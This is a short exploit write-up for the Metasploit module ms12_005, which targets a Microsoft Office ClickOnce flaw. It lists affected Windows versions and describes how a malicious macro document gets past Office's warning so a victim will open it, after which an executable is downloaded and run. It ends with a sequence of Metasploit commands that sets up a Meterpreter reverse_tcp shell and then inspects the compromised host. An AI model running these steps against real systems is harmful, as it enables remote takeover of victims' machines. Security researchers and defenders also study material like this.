Timeline :
Vulnerability discovered by Yorick Koster in Jun 2010
Coordinated public release of the vulnerability the 2012-01-10
Metasploit PoC provided the 2012-06-10
PoC provided by :
Yorick Koster
Reference(s) :
Affected version(s) :
Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 Service Pack 2
Windows 7 32
Windows 7 32 SP1
Windows 7 x64
Windows 7 x64 SP1
Windows Server 2008 R2 x64
Windows Server 2008 R2 x64 SP1
Tested on Windows XP Pro SP3 with :
Microsoft Office Word 2007 (12.0.4518.1014)
Description :
The target will need an installation of Ruby or Python in order to execute the payload. Also macro execution in Word should be allowed.
This module exploits a vulnerability found in Microsoft Office’s ClickOnce feature. When handling a Macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This allows you to trick your victim into opening the malicious document, which will load up either a python or ruby payload based on your choosing, and then finally download and execute our executable.
Commands :
use exploit/windows/fileformat/ms12_005 set SRVHOST set PAYLOAD windows/meterpreter/reverse_tcp set LHOST exploit getuid sysinfo